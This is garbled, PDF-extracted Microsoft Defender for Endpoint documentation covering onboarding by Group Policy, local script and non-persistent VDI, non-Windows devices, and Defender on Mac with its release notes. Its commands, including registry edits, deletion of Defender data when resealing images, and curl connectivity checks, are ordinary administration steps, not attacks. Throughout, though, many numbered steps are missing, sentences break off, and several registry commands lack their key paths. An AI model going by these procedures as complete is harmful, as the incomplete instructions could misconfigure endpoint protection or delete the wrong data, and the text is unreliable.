Value: "1"
For more information, see Introduction to compliance settings in System Center 2012 R2
Related topics
device
 Tip
Feedback

Onboard Windows devices using Group
Policy
Article • 09/15/2023
） Important

Applies to:
Group Policy
７ Note
To use Group Policy (GP) updates to deploy the package, you must be on Windows
Server 2008 R2 or later.
For Windows Server 2019 and Windows Server 2022, you may need to replace NT
AUTHORITY\Well-Known-System-Account with NT AUTHORITY\SYSTEM of the XML
file that the Group Policy preference creates.
７ Note
If you're using the new, unified Microsoft Defender for Endpoint solution for
Windows Server 2012 R2 and 2016, please ensure you are using the latest ADMX
files in your central store to get access to the correct Microsoft Defender for
Endpoint policy options. Please reference How to create and manage the Central
Store for Group Policy Administrative Templates in Windows and download the
latest files for use with Windows 10.
1. Open the GP configuration package file

( WindowsDefenderATPOnboardingPackage.zip ) that you downloaded from the service
onboarding wizard. You can also get the package from the Microsoft Defender
portal :
Onboarding.
the file WindowsDefenderATPOnboardingScript.cmd.
3. To create a new GPO, open the Group Policy Management Console (GPMC), right-
click Group Policy Objects you want to configure and click New. Enter the name of
the new GPO in the dialogue box that is displayed and click OK.

Windows 7).
Change User or Group and type SYSTEM and then click Check Names then OK. NT
AUTHORITY\SYSTEM appears as the user account the task will run as.
name (FQDN), of the shared WindowsDefenderATPOnboardingScript.cmd file.
that you wish to link. Click OK.
 Tip
detection test on a newly onboarded Defender for Endpoint device.
Additional Defender for Endpoint configuration

settings
For each device, you can state whether samples can be collected from the device when a
request is made through Microsoft Defender XDR to submit a file for deep analysis.
You can use Group Policy (GP) to configure settings, such as settings for the sample
sharing used in the deep analysis feature.

1. On your GP management device, copy the following files from the configuration
package:
Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions
Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US
If you're using a Central Store for Group Policy Administrative Templates , copy
the following files from the configuration package:
Copy AtpConfiguration.admx into \\<forest.root>\SysVol\

<forest.root>\Policies\PolicyDefinitions
Copy AtpConfiguration.adml into \\<forest.root>\SysVol\

<forest.root>\Policies\PolicyDefinitions\en-US
2. Open the Group Policy Management Console, right-click the GPO you want to
configure and click Edit.
4. Click Policies, then Administrative templates.
5. Click Windows components and then Windows Defender ATP.
6. Choose to enable or disable sample sharing from your devices.
７ Note
If you don't set a value, the default value is to enable sample collection.
Update endpoint protection configuration

After configuring the onboarding script, continue editing the same group policy to add
endpoint protection configurations. Perform group policy edits from a system running
Windows 10 or Server 2019, Windows 11, or Windows Server 2022 to ensure you have
all of the required Microsoft Defender Antivirus capabilities. You may need to close and
reopen the group policy object to register the Defender ATP configuration settings.
All policies are located under Computer Configuration\Policies\Administrative

Templates .
Policy location: \Windows Components\Windows Defender ATP
ﾉ Expand table
Policy Setting
Enable\Disable Sample collection Enabled - "Enable sample collection on machines" checked
Policy location: \Windows Components\Microsoft Defender Antivirus
ﾉ Expand table
Policy Setting
Configure detection for potentially unwanted applications Enabled, Block
Policy location: \Windows Components\Microsoft Defender Antivirus\MAPS
ﾉ Expand table
Policy Setting
Join Microsoft MAPS Enabled, Advanced MAPS
Send file samples when further analysis is required Enabled, Send safe samples
Policy location: \Windows Components\Microsoft Defender Antivirus\Real-time

Protection
ﾉ Expand table
Policy Setting
Turn off real-time protection Disabled
Turn on behavior monitoring Enabled
Scan all downloaded files and attachments Enabled
Monitor file and program activity on your computer Enabled
Policy location: \Windows Components\Microsoft Defender Antivirus\Scan
These settings configure periodic scans of the endpoint. We recommend performing a

weekly quick scan, performance permitting.
ﾉ Expand table
Policy Setting
Check for the latest virus and spyware security intelligence before running a scheduled Enabled
scan
Policy location: \Windows Components\Microsoft Defender Antivirus\Microsoft
Defender Exploit Guard\Attack Surface Reduction
Get the current list of attack surface reduction rules GUIDs from Attack surface reduction
rules deployment Step 3: Implement ASR rules. For additional, per rules details, see
1. Open the Configure Attack Surface Reduction policy.
2. Select Enabled.
3. Select the Show button.
4. Add each GUID in the Value Name field with a Value of 2.
This will set each up for audit only.
ﾉ Expand table
Policy Location Setting
Configure \Windows Components\Microsoft Defender Enabled,

Controlled folder Antivirus\Microsoft Defender Exploit Guard\Controlled Audit Mode
access Folder Access

７ Note
1. Get the offboarding package from the Microsoft Defender portal :
Offboarding.
accessed by the device. You should have a file named

5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab under Security options and
select Change User or Group, enter SYSTEM, then select Check Names and then
OK. NT AUTHORITY\SYSTEM appears as the user account that the task will run as.
privileges check-box.
9. Go to the Actions tab and select New.... Ensure that Start a program is selected in
name (FQDN), of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd file.
） Important
to 6 months.

With Group Policy there isn't an option to monitor deployment of policies on the
devices. Monitoring can be done directly on the portal, or by using the different
deployment tools.

1. Go to the Microsoft Defender portal .
７ Note
It can take several days for devices to start showing on the Devices list. This
includes the time it takes for the policies to be distributed to the device, the time it
takes before the user logs on, and the time it takes for the endpoint to start
reporting.
Setup Defender AV policies
Create a new Group Policy or group these settings in with the other policies. This is
dependent upon the customer's environment and how they would like to roll out the
service by targeting different organizational units (OUs).
1. After you choose the GP, or create a new one, edit the GP.

Windows Components > Microsoft Defender Antivirus > Real-time Protection.
3. In the Quarantine folder, configure removal of items from Quarantine folder.

4. In the Scan folder, configure the scan settings.
Monitor all files in Real time protection

Components > Microsoft Defender Antivirus > Real-time Protection.

Configure Windows Defender SmartScreen settings

Windows Components > Windows Defender SmartScreen > Explorer.

Windows Components > Windows Defender SmartScreen > Microsoft Edge.
Configure Potentially Unwanted Applications



Configure Cloud Deliver Protection and send samples

automatically
Components > Microsoft Defender Antivirus > MAPS.




７ Note
The Send all samples option will provide the most analysis of binaries/scripts/docs
which increases security posture. The Send safe samples option limits the type of
binaries/scripts/docs being analyzed, and decreases security posture.
For more information, see Turn on cloud protection in Microsoft Defender Antivirus, and
Cloud protection and sample submission in Microsoft Defender Antivirus.
Check for signature update

Components > Microsoft Defender Antivirus > Security Intelligence Updates.

Configure cloud deliver timeout and protection level

Components > Microsoft Defender Antivirus > MpEngine. When you configure cloud
protection level policy to Default Microsoft Defender Antivirus blocking policy this will
disable the policy. This is what is required to set the protection level to the windows
default.

Related topics
devices
 Tip
Feedback

Onboard Windows devices using a local
script
Article • 09/01/2023
Applies to:

You can also manually onboard individual devices to Defender for Endpoint. You might
want to do this first when testing the service before you commit to onboarding all
devices in your network.
） Important
This script has been optimized for use on up to ten devices. Local scripting is a
special onboarding method for evaluating Microsoft Defender for Endpoint. The
data reporting frequency is set higher than with other onboarding methods when
onboarding using a local script. This setting is for evaluation purposes and is not
normally used in production deployments. For this reason, there are concerns
about environmental impact, so we recommend limiting the number of
deployments using local scripts to ten. If you are deploying to a production
environment as previously described, use other deployment options like Group
Policy or Microsoft Endpoint Configuration Manager.
Onboard devices
1. Open the configuration package .zip file
service onboarding wizard. You can also get the package from Microsoft Defender
portal :
Onboarding.
2. Extract the contents of the configuration package to a location on the device you
want to onboard (for example, the Desktop). You should have a file named
WindowsDefenderATPLocalOnboardingScript.cmd.
%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd
6. Type "Y" and enter when prompted.
7. After the script completes, it will display "Press any key to continue...". Press any
key to complete the steps on the device.
For information on how you can manually validate that the device is compliant and
correctly reports sensor data see, Troubleshoot Microsoft Defender for Endpoint
onboarding issues.
 Tip
device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Microsoft Defender for Endpoint endpoint.

You can manually configure the sample sharing setting on the device by using regedit or
creating and running a .reg file.
Console

Value: 0 or 1
Where Name type is a D-WORD. Possible values are:
0 - doesn't allow sample sharing from this device

1 - allows sharing of all file types from this device


When downloading an offboarding package you will be notified of the packages expiry
７ Note

Offboarding.
accessed by the devices. You should have a file named


%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-
MM-DD.cmd
） Important
to 6 months.

You can follow the different verification steps in the Troubleshoot onboarding issues to
verify that the script completed successfully and the agent is running.
Monitoring can also be done directly on the portal, or by using the different deployment
tools.

1. Go to Microsoft Defender portal .
Related articles
device
 Tip
Feedback

Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft
Defender XDR
Article • 09/21/2023
Virtual desktop infrastructure (VDI) is an IT infrastructure concept that lets end users
access enterprise virtual desktops instances from almost any device (such as your
personal computer, smartphone, or tablet), eliminating the need for organization to
provide users with physical machines. Using VDI devices reduce cost as IT departments
are no longer responsible for managing, repairing, and replacing physical endpoints.
Authorized users can access the same company servers, files, apps, and services from
any approved device through a secure desktop client or browser.
Like any other system in an IT environment, these too should have an Endpoint
Detection and Response (EDR) and Antivirus solution to protect against advanced
threats and attacks.
Applies to:

Virtual desktop infrastructure (VDI) devices
Windows 10, Windows 11, Windows Server 2019, Windows Server 2022, Windows
Server 2008R2/2012R2/2016
７ Note
Persistent VDI's - Onboarding a persistent VDI machine into Microsoft Defender for
Endpoint is handled the same way you would onboard a physical machine, such as
a desktop or laptop. Group policy, Microsoft Configuration Manager, and other
methods can be used to onboard a persistent machine. In the Microsoft Defender
portal, (https://security.microsoft.com ) under onboarding, select your preferred
onboarding method, and follow the instructions for that type. For more information
see Onboarding Windows client.
Onboarding non-persistent virtual desktop
infrastructure (VDI) devices
Defender for Endpoint supports non-persistent VDI session onboarding.
There might be associated challenges when onboarding VDI instances. The following are
typical challenges for this scenario:
Instant early onboarding of a short-lived session, which must be onboarded to

Defender for Endpoint prior to the actual provisioning.
The device name is typically reused for new sessions.
In a VDI environment, VDI instances can have short lifespans. VDI devices can appear in
the Microsoft Defender portal as either single entries for each VDI instance or multiple
entries for each device.
Single entry for each VDI instance. If the VDI instance was already onboarded to
Microsoft Defender for Endpoint, and at some point deleted, and then recreated
with the same host name, a new object representing this VDI instance is NOT be
created in the portal.
７ Note
In this case, the same device name must be configured when the session is
created, for example using an unattended answer file.
Multiple entries for each device - one for each VDI instance.
） Important
If you're deploying non-persistent VDIs through cloning technology, make sure

that your internal template VMs are not onboarded to Defender for Endpoint. This
recommendation is to avoid cloned VMs from being onboarded with the same
senseGuid as your template VMs, which could prevent VMs from showing up as
new entries in the Devices list.
The following steps guide you through onboarding VDI devices and highlight steps for
single and multiple entries.
２ Warning
For environments where there are low resource configurations, the VDI boot
procedure might slow the Defender for Endpoint sensor onboarding.
Onboarding steps
７ Note
Windows Server 2016 and Windows Server 2012 R2 must be prepared by applying
the installation package first using the instructions in Onboard Windows servers
for this feature to work.

service onboarding wizard. You can also get the package from the Microsoft
Defender portal :
Onboarding.
2. Copy the files from the WindowsDefenderATPOnboardingPackage folder extracted

from the .zip file into the golden/primary image under the path
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup .
a. If you are implementing multiple entries for each device - one for each session,
copy WindowsDefenderATPOnboardingScript.cmd.
b. If you're implementing a single entry for each device, copy both Onboard-
NonPersistentMachine.ps1 and WindowsDefenderATPOnboardingScript.cmd.
７ Note
If you don't see the

C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be
hidden. You'll need to choose the Show hidden files and folders option from
File Explorer.
3. Open a Local Group Policy Editor window and navigate to Computer

Configuration > Windows Settings > Scripts > Startup.
７ Note
Domain Group Policy may also be used for onboarding non-persistent VDI
devices.
4. Depending on the method you'd like to implement, follow the appropriate steps:
For single entry for each device:
Select the PowerShell Scripts tab, then select Add (Windows Explorer opens
directly in the path where you copied the onboarding script earlier). Navigate
to onboarding PowerShell script Onboard-NonPersistentMachine.ps1 . There's
no need to specify the other file, as it is triggered automatically.
For multiple entries for each device:
Select the Scripts tab, then click Add (Windows Explorer opens directly in the
path where you copied the onboarding script earlier). Navigate to the
onboarding bash script WindowsDefenderATPOnboardingScript.cmd .
5. Test your solution:
a. Create a pool with one device.
b. Log on to device.
c. Log off from device.
d. Log on to device with another user.
e. Depending on the method you'd like to implement, follow the appropriate

steps:
For single entry for each device: Check only one entry in Microsoft
Defender portal.
For multiple entries for each device: Check multiple entries in Microsoft
Defender portal.
6. Click Devices list on the Navigation pane.
7. Use the search function by entering the device name and select Device as search
type.
For downlevel SKUs (Windows Server 2008 R2)
７ Note
These instructions for other Windows server versions also apply if you are running
the previous Microsoft Defender for Endpoint for Windows Server 2016 and
Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new
unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.
The following registry is relevant only when the aim is to achieve a 'Single entry for each
device'.
1. Set registry value to:
Console
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat

Protection\DeviceTagging]
"VDI"="NonPersistent"
or using command line:
Console
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows

Advanced Threat Protection\DeviceTagging" /v VDI /t REG_SZ /d
"NonPersistent" /f
2. Follow the server onboarding process.
Updating virtual desktop infrastructure (VDI)

images (persistent or non-persistent)
With the ability to easily deploy updates to VMs running in VDIs, we've shortened this
guide to focus on how you can get updates on your machines quickly and easily. You no
longer need to create and seal golden images on a periodic basis, as updates are
expanded into their component bits on the host server and then downloaded directly to
the VM when it's turned on.
If you have onboarded the primary image of your VDI environment (SENSE service is
running), then you must offboard and clear some data before putting the image back
into production.
1. Offboard the machine.
2. Ensure the sensor is stopped by running the following command in a CMD

window:
Console
sc query sense
3. Run the following commands in a CMD window::
Console
del "C:\ProgramData\Microsoft\Windows Defender Advanced Threat

Protection\Cyber\*.*" /f /s /q
/v senseGuid /f
/v 7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\48A68F11-7A16-4180-B32C-7F974C7BD783" /f
exit
Are you using a third party for VDIs?

If you're deploying non-persistent VDIs through VMware instant cloning or similar
technologies, make sure that your internal template VMs and replica VMs are not
onboarded to Defender for Endpoint. If you onboard devices using the single entry
method, instant clones that are provisioned from onboarded VMs might have the same
senseGuid, and that can stop a new entry from being listed in the Device Inventory view
(in the Microsoft Defender portal , choose Assets > Devices).
If either the primary image, template VM, or replica VM are onboarded to Defender for
Endpoint using the single entry method, it will stop Defender from creating entries for
new non-persistent VDIs in the Microsoft Defender portal.
Reach out to your third-party vendors for further assistance.



Turn on cloud-delivered protection: Yes
Cloud-delivered protection level: Not configured
Defender Cloud Extended Timeout In Seconds: 20
Exclusions
Please review the FXLogix antivirus exclusion recommendations here: Prerequisites

for FSLogix.
Turn on all settings and set to monitor all files
Remediation
Number of days to keep quarantined malware: 30
Submit samples consent: Send all samples automatically
Action to take on potentially unwanted apps: Enable
Actions for detected threats:
Low threat: Clean
Moderate threat, High threat, Severe threat: Quarantine
Scan
Scan archived files: Yes
Use low CPU priority for scheduled scans: Not configured
Disable catch-up full scan: Not configured
Disable catchup quick scan: Not configured
CPU usage limit per scan: 50
Scan mapped network drives during full scan: Not configured
Run daily quick scan at: 12 PM
Scan type: Not configured
Day of week to run scheduled scan: Not configured
Time of day to run a scheduled scan: Not configured
Check for signature updates before running scan: Yes
Updates
Enter how often to check for security intelligence updates: 8

Leave other settings in default state
User experience
Allow user access to Microsoft Defender app: Not configured
Enable Tamper protection

Enable tamper protection to prevent Microsoft Defender being disabled: Enable

Enable network protection: Test mode
Require SmartScreen for Microsoft Edge: Yes
Block malicious site access: Yes
Block unverified file download: Yes

７ Note
detections.
Related topics
Onboard Windows devices using Microsoft Configuration Manager
 Tip
Feedback

Article • 01/23/2024
Applies to:

Platforms
macOS
Linux
Defender for Endpoint provides a centralized security operations experience for

Windows and non-Windows platforms. You'll be able to see alerts from various
supported operating systems (OS) in Microsoft Defender XDR and better protect your
organization's network.
You'll need to know the exact Linux distros and macOS versions that are compatible with
Defender for Endpoint for the integration to work. For more information, see:
Microsoft Defender for Endpoint on Linux system requirements

Microsoft Defender for Endpoint on macOS system requirements.
Onboarding non-Windows devices

You can choose to onboard non-Windows devices through Microsoft Defender for
Endpoint or through a third-party solution.
２ Warning

You'll need to take the following steps:

1. Select your preferred method of onboarding:
To onboard macOS devices using Microsoft Defender for Endpoint, see

Microsoft Defender for Endpoint on Mac.
To onboard Linux devices using Microsoft Defender for Endpoint, see
To onboard non-windows devices using third party solution:
a. In the navigation pane, select Partners and APIs > Connected
Applications. Make sure the third-party solution is listed.
b. In the Connected Applications page, select the partner that supports your
non-Windows devices.
c. Select View to open the partner's page. Follow the instructions provided
on the page.
d. After creating an account or subscribing to the partner solution, you
should get to a stage where a tenant Global Admin in your organization is
asked to accept a permission request from the partner application. Read
the permission request carefully to make sure that it's aligned with the
service that you require.
2. Run a detection test by following the instructions of the third-party solution.
Offboard non-Windows devices

For macOS and Linux devices, you can choose to offboard through Microsoft Defender
for Endpoint. In the navigation pane, select Settings > Offboard > Select Operating
System to start the offboarding Process.
For details on offboarding Microsoft Defender on macOS, see Uninstalling Microsoft

Defender for macOS.
You can also offboard non-Windows devices by disabling the third-party integration.
Enable coverage for devices running non-Windows platforms by integrating third-party
solutions .
Related topics
Onboard servers
Configure proxy and Internet connectivity settings
Troubleshooting Microsoft Defender for Endpoint onboarding issues
 Tip
Feedback

Mac
Article • 01/02/2024
Applies to:

This topic describes how to install, configure, update, and use Defender for Endpoint on
Mac.
Ｕ Caution
Running other third-party endpoint protection products alongside Microsoft

Defender for Endpoint on Mac is likely to lead to performance problems and
unpredictable side effects. If non-Microsoft endpoint protection is an absolute
requirement in your environment, you can still safely take advantage of Defender
for Endpoint on Mac EDR functionality after configuring the antivirus functionality
to run in Passive mode.
What's new in the latest release

What's new in Microsoft Defender for Endpoint on Mac
 Tip
If you have any feedback that you would like to share, submit it by opening
Microsoft Defender for Endpoint on Mac on your device and navigating to Help >
Send feedback.
To get the latest features, including preview capabilities (such as endpoint detection and
response for your Mac devices), configure your macOS device running Microsoft
Defender for Endpoint to be a Beta channel (formerly Insider-Fast) device.

on Mac
Prerequisites
A Defender for Endpoint subscription and access to the Microsoft Defender portal
Beginner-level experience in macOS and BASH scripting
Administrative privileges on the device (in case of manual deployment)
There are several methods and deployment tools that you can use to install and
configure Defender for Endpoint on Mac.
Third-party management tools:

Microsoft Intune-based deployment
JAMF-based deployment
Other MDM products
Command-line tool:
Manual deployment
System requirements
The three most recent major releases of macOS are supported.
14 (Sonoma), 13 (Ventura), 12 (Monterey)
） Important
On macOS 11 (Big Sur) and above, Microsoft Defender for Endpoint requires
additional configuration profiles. If you are an existing customer upgrading
from earlier versions of macOS, make sure to deploy the additional
configuration profiles listed on New configuration profiles for macOS Big Sur
and newer versions of macOS.
Supported processors: x64 and ARM64.
Disk space: 1GB
Beta versions of macOS aren't supported.
After you've enabled the service, you may need to configure your network or firewall to
allow outbound connections between it and your endpoints.
Microsoft Defender for Endpoint on Mac requires one of the following Microsoft
Volume Licensing offers:
Microsoft 365 E5 (M365 E5)

Microsoft 365 E5 Security
Microsoft 365 A5 (M365 A5)
Windows 10 Enterprise E5
Microsoft 365 Business Premium
Windows 11 Enterprise E5
Microsoft Defender for Endpoint P2
Microsoft Defender for Endpoint P1 (which includes Microsoft 365 E3 (M365 E3) )
７ Note
Eligible licensed users may use Microsoft Defender for Endpoint on up to five
concurrent devices. Microsoft Defender for Endpoint is also available for purchase
from a Cloud Solution Provider (CSP). When purchased via a CSP, it does not
require Microsoft Volume Licensing offers listed.
Configuring Exclusions
When adding exclusions, be mindful of common exclusion mistakes for Microsoft
Defender Antivirus.
Network connections
that your network must be able to connect to. You should ensure that there are no
firewall or network filtering rules that would deny access to these URLs, or you may
need to create an allow rule specifically for them.
ﾉ Expand table
customers.
Microsoft Defender for Endpoint can discover a proxy server by using the following
discovery methods:
Proxy autoconfig (PAC)

Web Proxy Autodiscovery Protocol (WPAD)
Manual static proxy configuration
permitted in the previously listed URLs.
２ Warning
Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static
proxy is being used.
through data from Microsoft Defender for Endpoint on macOS to the relevant URLs
without interception. Adding your interception certificate to the global store will
not allow for interception.
To test that a connection isn't blocked, open https://x.cp.wd.microsoft.com/api/report

and https://cdn.x.cp.wd.microsoft.com/ping in a browser.
If you prefer the command line, you can also check the connection by running the
following command in Terminal:
Bash
curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report'
'https://cdn.x.cp.wd.microsoft.com/ping'
The output from this command should be similar to the following:
OK https://x.cp.wd.microsoft.com/api/report
OK https://cdn.x.cp.wd.microsoft.com/ping
Ｕ Caution
We recommend that you keep System Integrity Protection (SIP) enabled on

client devices. SIP is a built-in macOS security feature that prevents low-level
tampering with the OS, and is enabled by default.
Once Microsoft Defender for Endpoint is installed, connectivity can be validated by

running the following command in Terminal:
Bash
mdatp connectivity test
How to update Microsoft Defender for

Endpoint on Mac
deliver new features. To update Microsoft Defender for Endpoint on Mac, a program
named Microsoft AutoUpdate (MAU) is used. To learn more, see Deploy updates for
Microsoft Defender for Endpoint on Mac.
How to configure Microsoft Defender for

Endpoint on Mac
Guidance for how to configure the product in enterprise environments is available in Set
preferences for Microsoft Defender for Endpoint on Mac.
macOS kernel and system extensions

Starting with macOS 11 (Big Sur), Microsoft Defender for Endpoint has been fully
migrated from kernel extension to system extensions.
Resources
For more information about logging, uninstalling, or other topics, see Resources
for Microsoft Defender for Endpoint on Mac.
Privacy for Microsoft Defender for Endpoint on Mac.
Turn on Network protection for macOS
 Tip
Feedback

Endpoint on Mac
Article • 09/28/2023
Applies to:

For more information on Microsoft Defender for Endpoint on other operating systems:
What's new in Microsoft Defender for Endpoint on Linux

What's new in Microsoft Defender for Endpoint on iOS
Built-in Scheduled Scan for macOS (Public Preview)
Scheduled Scan built-in for Microsoft Defender for Endpoint on macOS is now available
in Public Preview. To learn more, see How to schedule scans with Microsoft Defender for
Endpoint on macOS.
Troubleshooting mode for macOS (Public Preview)
Troubleshooting mode helps you identify instances where antivirus might be causing
issues with your applications or system resources. Troubleshooting mode for macOS is
now available in Public Preview. To learn more, see Troubleshooting mode in Microsoft
Defender for Endpoint on macOS.
Mac devices receive built-in protection
Tamper protection is turned on in block mode by default. This setting helps secure your
Mac against threats. To learn more, see Protect macOS security settings with tamper
protection.
Network protection available for macOS
Network protection for macOS is now available for all Mac devices onboarded to
Defender for Endpoint. Devices must meet the minimum requirements. To learn more,
see Use network protection to help prevent macOS connections to bad sites.
Known issues
Apple fixed an issue on macOS Ventura upgrade , which is fixed with the latest OS
update. The issue impacts Microsoft Defender for Endpoint security extensions, and
might result in losing Full Disk Access Authorization, impacting its ability to function
properly.
Sonoma support
Microsoft Defender supports macOS Sonoma (14.0) in the current Defender release.
macOS Deprecation
７ Note
Microsoft Defender for Endpoint no longer supports these macOS as Apple ended
support for:
Big Sur (11) in December 2023.

20.123122.5.0)
ﾉ Expand table
Build: 101.23122.0005
What's new
[device control] Fixes for Bluetooth devices support

Bug and performance fixes
Dec-2023 (Build: 101.23102.0020 | Release version:

20.123102.20.0)
ﾉ Expand table
Build: 101.23102.0020
What's new
Nov-2023 (Build: 101.23092.0007 | Release version:

20.123092.7.0)
ﾉ Expand table
Build: 101.23092.0007
What's new
[device control] set policy for DCv2 via 'mdatp config'

Configuration loading - error logged to
/Library/Logs/Microsoft/mdatp/microsoft_defender_core_err.log includes bad
property name in JSON
７ Note
If you use Device Control v1, consider migrating to v2 (that includes all v1
functionality and more). Device Control v1 will be considered deprecated in the
nearest future. To check, run the [mdatp health --details device_control](mac-
device-control-overview.md#status) command, and inspect the active property, it
should not contain "v1".

Oct-2023 (Build: 101.23082.0018 | Release version:
20.123082.18.0)
ﾉ Expand table
Build: 101.23082.0018
What's new
[device control] Detailed status with mdatp health --details device_control

[device control] mdatp config device-control policy to set policy on a
nonmanaged machine
Sep-2023 (Build: 101.23072.0025 | Release version:

20.123072.25.0)
ﾉ Expand table
Build: 101.23072.0025
What's new

Fix: Security Portal events might have missed ancestors details for short lived
processes
Fix: Major performance issues on macOS when Network Protection is set to Audit
mode
20.123062.16.0)
ﾉ Expand table
Build: 101.23062.0016
What's new

Fix: macOS complains that uninstall background task is from unidentified
developer
Jul-2023 (Build: 101.23052.0004 | Release version:

20.123052.4.0)
ﾉ Expand table
Build: 101.23052.0004
What's new
Client version schema change

Fix: Defender doesn't start on a machine with certain versions of Microsoft Edge
due to directory permission issue
Jun-2023 (Build: 101.98.84 | Release version:

20.123042.19884.0)
ﾉ Expand table
Build: 101.98.84
What's new
System Extensions health command mdatp health --details system_extensions


20.123032.19871.0)
ﾉ Expand table
Build: 101.98.71
What's new
Tamper Protection health command mdatp health --details tamper_protection

Tamper Protection - MDM processes exclusions
Fix: Remove Codesigned Artifact from App Bundle

20.123022.19870.0)
ﾉ Expand table
Build: 101.98.70

Build: 101.98.70
What's new
Mar-2023 (Build: 101.98.30 | Release version:

20.123012.19830.0)
ﾉ Expand table
Build: 101.98.30
What's new
Feb-2023 (Build: 101.97.94 | Release version:

20.123011.19794.0)
ﾉ Expand table
Build: 101.97.94
What's new
Improved performance, stability, and security

Bug fixes
Discontinued support macOS Catalina [10.15]
Build: 101.96.85
What's new
Build: 101.90.97
What's new
Scanning optimization for move file operations

Adding exclusions from command line now requires admin privileges
Decrease sysextd noise from Tamper Protection in Advanced Hunting
Released: Nov 5, 2022

Published: Nov 5, 2022
Build: 101.87.30
What's new
Fix for some users experiencing performance issues and temporary system hangs
Released: Oct 25, 2022

Published: Oct 25, 2022
Build: 101.86.81
What's new
Bug fix: Upgrade fails if \_mdatp user a member of \_lpadmin group
） Important
This is a minimal recommended MDE version for macOS Ventura.
Oct-2022 (Build: 101.82.21 | Release version: 20.122082.18221.0)
Build: 101.82.21
What's new
Bug fix - Mac TP in Block mode causing device hang on shutdown/crashes on

reboot
Add a mdatp command-line switch to view the on-demand scan history
Improve Performance of Device Owner on macOS
Ready for macOS Ventura (13.0)
Build: 101.78.13
What's new
Fix for uninstaller to properly delete Application Support folder

Fix for Network Protection not filtering Safari when Firewall or iCloud Private Relay
is on
Fix for osqueryui zombie processes
Fix for UI crash on Ventura
Fix for definitions not getting downloaded right after install
Other bug fixes
Released: Aug 3, 2022

Published: Aug 3, 2022
Build: 101.75.90
What's new
Added a new field in the output of mdatp health that can be used to query the
enforcement level of the network protection feature. The new field is called
network_protection_enforcement_level and can take one of the following values:
audit , block , or disabled .
Addressed a product bug where multiple detections of the same content could
lead to duplicate entries in the threat history.
Other bug fixes.
Released: Jul 21, 2022

Published: Jul 21, 2022
Build: 101.73.77
What's new
Addressed an issue where printing couldn't be completed successfully due to the

network extension
Added an option to configure file hash computation
From this build onwards, the product has the new anti-malware engine by default
Performance improvements for file copy operations
Bug fixes
Released: Jul 7, 2022

Published: Jul 7, 2022
Build: 101.71.18
What's new
mdatp connectivity test added an extra URL. The new URL is
https://go.microsoft.com/fwlink/?linkid=2144709 .
Up until now, the product log level didn't persist between product restarts.
Beginning in this version, there's a new command-line tool switch that persists the
log level. The new command is mdatp log level persist --level <level> .
Fixed a bug in the product installation package that in rare cases could lead a loss
of product state during updates
Performance improvements for file copy operations and built-in macOS
applications
Bug fixes
Released: Jun 14, 2022

Published: Jun 14, 2022
Build: 101.70.19
What's new
Fixed a bug where threat-related notifications weren't always presented to the end
user.
Performance improvements & other updates.
Released: Jun 2, 2022

Published: Jun 2, 2022
Build: 101.70.18
What's new
Fixed a bug where the installation package was sometimes hanging indefinitely
during product updates
Fixed a bug where the product sometimes was incorrectly detecting files inside the
quarantine folder
Build: 101.66.54
What's new
Addressed an issue where mdatp diagnostic real-time-protection-statistics

wasn't printing the correct process path in some cases.
Bug fixes
Released: Apr 26, 2022

Published: Apr 26, 2022
Build: 101.64.15
What's new
Fixed a regression introduced in version 101.61.69 where the status menu icon was
sometimes showing an error icon, even though no action was required from the
end user
Improved the conflicting_applications field in mdatp health to show only the
most recent 10 processes and also to include the process names. This makes it
easier to identify which processes are potentially conflicting with Microsoft
Defender for Endpoint for Mac.
Fixed a bug in mdatp device-control removable-media policy list where vendor
ID and product ID were displayed as decimal instead of hexadecimal

Build: 101.61.69
What's new
Bug fixes
Build: 101.60.91
What's new
This version contains a security update for CVE-2022-23278

Build: 101.59.50
What's new
This version adds support for macOS 12.3. Starting with macOS 12.3, Apple is
removing Python 2.7 . There's no Python version preinstalled on macOS by
default. ACTION NEEDED:
Users must update Microsoft Defender for Endpoint for Mac to version
101.59.50 (or newer) before updating their devices to macOS Monterey 12.3 (or
newer). This minimal version 101.59.50 is a prerequisite to eliminating Python-
related issues with Microsoft Defender for Endpoint for Mac on macOS
Monterey.
For remote deployments, existing MDM setups must be updated to Microsoft
Defender for Endpoint for Mac version 101.59.50 (or newer). Pushing via MDM
an older Microsoft Defender for Endpoint for Mac version to macOS Monterey
12.3 (or newer) results in an installation failure. **\n
Feb-2022 (Build: 101.59.10 | Release version: 20.122012.15910.0)

Build: 101.59.10
What's new
The command-line tool now supports restoring quarantined files to a location

other than the one where the file was originally detected. This can be done
through mdatp threat quarantine restore --id [threat-id] --path [destination-
folder] .
Extended device control to handle devices connected over Thunderbolt 3
Improved the handling of device control policies containing invalid vendor IDs and
product IDs. Before this version, if the policy contained one or more invalid IDs, the
entire policy was ignored. Starting from this version, only the invalid portions of
the policy are ignored. Issues with the policy are surfaced through mdatp device-
control removable-media policy list .
Bug fixes

Build: 101.56.62
What's new
Bug fixes

Build: 101.56.35
What's new
The application is renamed from "Microsoft Defender ATP" to "Microsoft

Defender". End users observe the following changes:
The application installation path has been changed from /Application/Microsoft
Defender ATP.app to /Applications/Microsoft Defender.app .
Within the user experience, occurrences of "Microsoft Defender ATP" have been
replaced with "Microsoft Defender"
Resolved an issue where some VPN applications couldn't connect due to the
network content filter that is distributed with Microsoft Defender for Endpoint for
Mac
Addressed an issue discovered in macOS 12.2 preview 2 where the installation
package couldn't be opened due to a change in the operating system (OS) that
prevents installation of packages with certain characteristics. While it appears that
